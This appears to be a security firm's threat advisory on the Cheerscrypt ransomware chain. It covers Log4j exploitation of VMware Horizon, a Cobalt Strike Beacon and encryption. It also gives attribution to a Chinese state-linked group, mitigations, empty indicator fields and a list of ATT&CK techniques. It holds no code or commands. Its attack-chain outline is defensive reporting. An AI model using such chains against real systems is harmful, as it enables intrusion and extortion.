Get in Touch
Previous targets have included organisations from the Financial, Construction, Advertising, and Healthcare sectors.
The Defence sector remains a potential target due to Chinese-state ambitions.
Severity level: High – This attack method is difficult to exploit, however, once successful, the exploit may result in significant sensitive data loss.
The Cheerscrypt ransomware has previously been affiliated with cyber-attacks against western private organisations and is highly likely linked to the Chinese state-sponsored group ‘Emperor Dragonfly’ also known as ‘Bronze Starlight’, based on the victims being targets of interest for the Chinese government and report correlation.
First detected in May 2022, Cheerscrypt is deployed as part of a chained attack made up of multiple malware strains including initial system exploitation by Night Sky, the deployment of a Cobalt Strike Beacon, then the post exploitation and encryption of data by the Cheerscrypt ransomware.
The chain attack targets VMware Horizon via the widely reported Log4j vulnerability (CVE-2021-44228) to execute PowerShell commands, enabling the deployment to Cobalt Strike and ultimately Cheerscypt. The technique of multiple malware swaps in a single attack is designed to confuse the defender and obfuscate the attacker’s identity.
Successful exploitation will enable attackers to breach secure networks, steal data, and encrypt devices. Data will be sold on the dark web for financial gain and to fund future attacks.
If compromised, detection will be obvious as data will be encrypted and a message will be displayed informing you of the breach and the attacker’s demands.
VMware Horizon servers on both Windows and Linux.
Containment, Mitigations & Remediations
Customers are strongly recommended to update all VMware Horizon instances to the latest patch to bring them in line with the latest defensive structure.
Additionally, customers are advised to use counter measures such as Microsoft Defender to detect and block malicious attempts and malware infiltration.
Indicators of Compromise
Known Night Sky hash:
Associated Night Sky IP:
Known Cobalt Strike hash:
Associated Cobalt Strike IP:
Known Cheerscrypt hash:
Associated Cheerscrypt IP:
There is a realistic possibility that targeted Chinese attacks against western organisations are conducted as ransomware to mask government-sponsored espionage under a guise of financial motivation. This then moves blame away from the Chinese government and the motive of intellectual property theft.
While there are no reports of this method of attack directly targeting the defence sector, the sector is almost certainly a top priority for the Chinese government and future attacks cannot be ruled out.
Chinese State-Sponsored ‘Emperor Dragonfly’
Night Sky tactics, techniques and procedures (TTPs):
T1005 – Data from Local System
T1021.002 – Remote Services: SMB/Windows Admin Shares
T1027 – Obfuscated Files or Information
T1047 – Windows Management Instrumentation
T1048 – Exfiltration Over Alternative Protocol
T1059.001 – Command and Scripting Interpreter: PowerShell
T1059.004 – Command and Scripting Interpreter: Unix Shell
T1078 – Valid Accounts
T1190 – Exploit Public-Facing Application
T1486 – Data Encrypted for Impact
T1497 – Virtualization/Sandbox Evasion
T1567.002 – Exfiltration Over Web Service: Exfiltration to Cloud Storage
T1569.002 – System Services: Service Execution
T1570 – Lateral Tool Transfer
T1574.002 – Hijack Execution Flow: DLL Side-Loading